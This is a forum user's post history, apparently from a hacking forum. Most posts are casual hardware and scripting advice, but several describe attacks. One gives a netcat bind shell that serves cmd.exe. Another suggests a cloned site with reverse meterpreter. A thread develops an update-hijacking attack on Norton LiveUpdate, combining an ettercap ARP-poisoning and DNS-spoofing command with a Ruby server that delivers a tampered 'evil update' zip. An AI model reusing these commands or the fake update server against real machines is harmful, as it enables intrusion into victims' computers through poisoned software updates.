-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
Get amd 6 core, the most bang for your buck , u will love it with a good card
And solid state hard drive
My Linux boots up in like 1 second
-
I just got a droid thunderbolt htc... i have not yet rooted but im curious, could you plug in a wifi adapter and install the linux drivers on a droid then start cracking wep and maybe a stronger sniffer
-
Once you figure out dnspoof, check out SET website cloner with java ap, reverse meterpreter
-
Wine works with autoit
It Can be done just as easy with ruby,perl,python
-
Auto scripting is fun and easy to learn
While 1
If is_pressed("j") then
Send(" {backspace} im gay")
End
Install autoit and check out winzip tutorial
-
Nc -l -p 666 -d cmd.exe
-
im not sure the why you want it hooked to a tv, maybe explain...
i recommend xrdp
-
this could be a fun first timers project. you should check out the scripting language autoit.
if (window exists "instant messenger" with text("power on") then execute("net system power on")
the syntax here is improper, this can be done with only a few lines of code with autoit
you should install autoit and check out the win zip tutorial
I'm sure you will have a lots of fun.
-
Sudo apt-cache search rdp l grep server
-
here is a quick update on what i have done so far... i was going to make a video but i see no need... the client successfully downloads the modified zip file from my computer during the dns spoof (screenshot of wireshark) i just need to modify the zip packages contents to trigger execution...
sudo ettercap -T -F filter.ef -P dns_spoof -M arp // //
first thing is the ettercap filter drops encryption for more plaintext (not sure if its needed for this situation but i like to use it) dns_spoof: [liveupdate.symantecliveupdate.com] spoofed to [192.168.1.104]
sudo ruby exploit.rb
(its something i put together in a few minutes, dont judge me ,-P
require 'socket' #SERVER server = TCPServer.open(80) loop { client = server.accept print client.read(100) #should recive /get /minitri.flg client.puts("HTTP/1.1 200 OK Content-Length: 1 Content-Type: text/plain Last-Modified: Fri, 29 Jul 2005 20:24:32 GMT ETag: "+'"'+"1-42ea9080"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 01:52:21 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=1800\n\r\n\r") print client.read(100) #should recive GET /update symnetc from client client.print("HTTP/1.1 200 OK Content-Type: application/zip Last-Modified: Sun, 15 May 2011 21:16:04 GMT ETag: W/"+'"'+"15a1-4dd04294"+'"'+" Accept-Ranges: bytes Date: Sun, 15 May 2011 20:50:18 GMT Connection: keep-alive Cache-Control: public,must-revalidate,max-age=240\n\r\n\r") #now send payload file = open('/home/bigmac/out.zip', "rb") # new evil update fileContent = file.read client.print(fileContent) #client.print "Closing the connection. Bye!" # client.close # Disconnect from the client }
wireshark screenshot of the zipfile downloaded 192.168.1.102 <---> 192.168.1.104
img838.imageshack.us/i/screenshotwireshark.png
... i should post the zipfile, im sure all that is needed is changing a few numbers around to trigger execution
-
ettercap, filter to drop encryption for more plain text... i fixed my problem with extracting the file ,-)
instead of pasting to text editor i just nc
netcat xxx.xxx.xx 80 > out.zip GET /streaming/norton$202009$20streaming$20virus$20definitions_1.0_symalllanguages_livetri.zip HTTP/1.1. If-Modified-Since: Sun, 08 May 2011 03:51:51 GMT. Cache-control: max-age=0. Cache-Control: no-cache. Cache-Control: max-stale=0. Cache-Control: min-fresh=1000. Accept: */*. HOST: liveupdate.symantecliveupdate.com. User-Agent: +V2Ga/n+ZIRfedhlw5VItU2dHhkjA/GTQAAAAALUE. Connection: Keep-Alive.
i open out.zip with text editor and removed the response header field from the top of the file and the file extracts just fine ,-)
i would really like to share more in-depth because this looks promising...
one of the files contents looks like this, one line
MOVE([TempDir],%StreamDefDir%)
i think this could give me sorta remote command execution
a quick test would be 'ping 192.168.1.101' (my labtop ip)
i found this log some one posted and now gives me a better view of whats going on... hxxp://community.norton.com/norton/attachments/norton/nis_feedback/92741/1/log.lu2.txt
-
Maybe I could get some ones opinion, I have captured a get request like /get symtec/id/dir/update.zip
I can reproduce this get request with ruby sockets and receive the binary data of the zip file. I saved this data and tried to extract its contents but it fails.
I hope to write my own evilgrade style exploit. Right now I'm on my Droid, I will post this get request and the binary data tonight. Any thoughts on how to properly handle this zip file please share
Question About Gathering Info
in Questions
Posted
Do me next